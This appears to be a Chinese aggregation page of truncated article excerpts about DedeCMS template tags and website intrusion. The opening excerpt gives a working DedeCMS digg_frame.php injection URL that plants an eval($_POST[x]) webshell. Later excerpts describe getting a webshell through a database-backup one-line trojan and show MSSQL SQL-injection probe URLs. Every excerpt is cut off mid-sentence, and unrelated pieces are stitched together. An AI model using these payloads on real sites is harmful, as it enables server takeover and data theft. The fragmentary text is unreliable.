1.注入漏洞 存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?> http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?> 注入成功,产生了注入文件. http://loc…

背景 webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的. webshell检测模型 Webshell的运行流程:hacker -> HTTP Protocol -> Web Server -> CGI.简单来看就是这样一…

在文章的末尾或侧边栏添加相关文章可以提高用户的黏度,提高pv,增加se的好印象(哈哈),那么dedecms如何调用相关文章呢?有三种方法可以实现. 第一种dedecms调用相关文章的方法,用默认的likearticle {dede:likearticle row='6' titlelen='40'} <li><a href="[field:arcurl/]" title="[field:title /]">[field:title /]<…

概念 Webshell就是以asp,php,jsp或cgi等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页后门. Access数据库拿webshell 首先看是否能找到网站漏洞进行网站的后台(sql注入等)或者通过扫描工具来看看是否网站有文件上传漏洞(在没拿到后台). 进入后台后,看看是否有数据库备份功能. a)   如果有数据库备份功能,用一句话木马.通过各种方法,把这句话写入到数据库,再把写入这句话的数据库通过备份变为后缀名为.asp的文件,当然要注意备份后的文件地址,然后进行访…

本文转自:http://ju.outofmemory.cn/entry/256317 只要从事互联网web开发的,都会碰上web站点被入侵的情况.这里我把查杀的一些方法采用随记的形式记录一下,一是方便自己以后的工作需要,二是给其他朋友提供一些参考帮助.写的不周的地方,高手们不要喷,欢迎给我提供更好的意见,对于我个人来说也是个提高,并表示感谢. 我们的服务器环境是linux,所以,肯定少不了用find这个命令,并且需要配合ls命令来使用. 1.可以查找近3天被修改过的文件,并显示文件列表详细信息:…

首先检测下MSSQL数据库的用户权限,一般有两种,一种是SA权限,这种权限很大,还有一种是DB_OWNER权限,这个权限赋给用户一些对数据库的修改.删除.新增数据库表,执行部分存储过程的权限.但是涉及到一些系统敏感操作权限不具备. 判断数据库类型:http:www.xx.com/detail.asp?id=1' and (select count(*) from msysobjects) > 0 --; 接着刺探数据库用户名:http://www.xx.com/detail.asp?id=1'…

注意:dede_archives这是系统默认的数据库表,如果你修改过表前缀dede_,请自行更改表名.在以下示例的标签中,有一部分只写出了SQL语句,具体的完整标签写法请参考:织梦SQL标签调用方法.具体的可以百度一下 共有文章:** 篇 {dede:sql sql="select count(ID) as c from dede_archives where channel=1"}·共有文章:[field:c /]篇{/dede:sql} 共有图集:** 个 {dede:sql sq…

织梦DedeCms 有个标签可以调用相关文章,通过下面的修改可以调用全站的相关文章,文章页内显示相关文章内容,可以提高关键词密度,还是挺不错的. 模板调用代码 <div>     <dl>           <dt><strong>相关文章</strong></dt>               <dd>                  <ul>                       {dede:li…

织梦调用子栏目名称在栏目.文章页及首页的方法是有区别的.首页的调用方法和在栏目的调用基本是一样的,如下: {dede:channel typeid=''} <li><h3><a href="[field:typeurl/]" title="[field:typename/]">[field:typename/]</a></h3></li> {/dede:channel} 这是调用制定顶级栏目下的…

[field:global name=autoindex runphp="yes"]@me=@me+1;[/field:global] {dede:global name=itemindex runphp="yes"}@me=@me+1;{/dede:global} autoindex itemindex 的使用心得区别 channelartlist 标签下使用 {dede:global name='itemindex' runphp='yes'}@me;{/ded…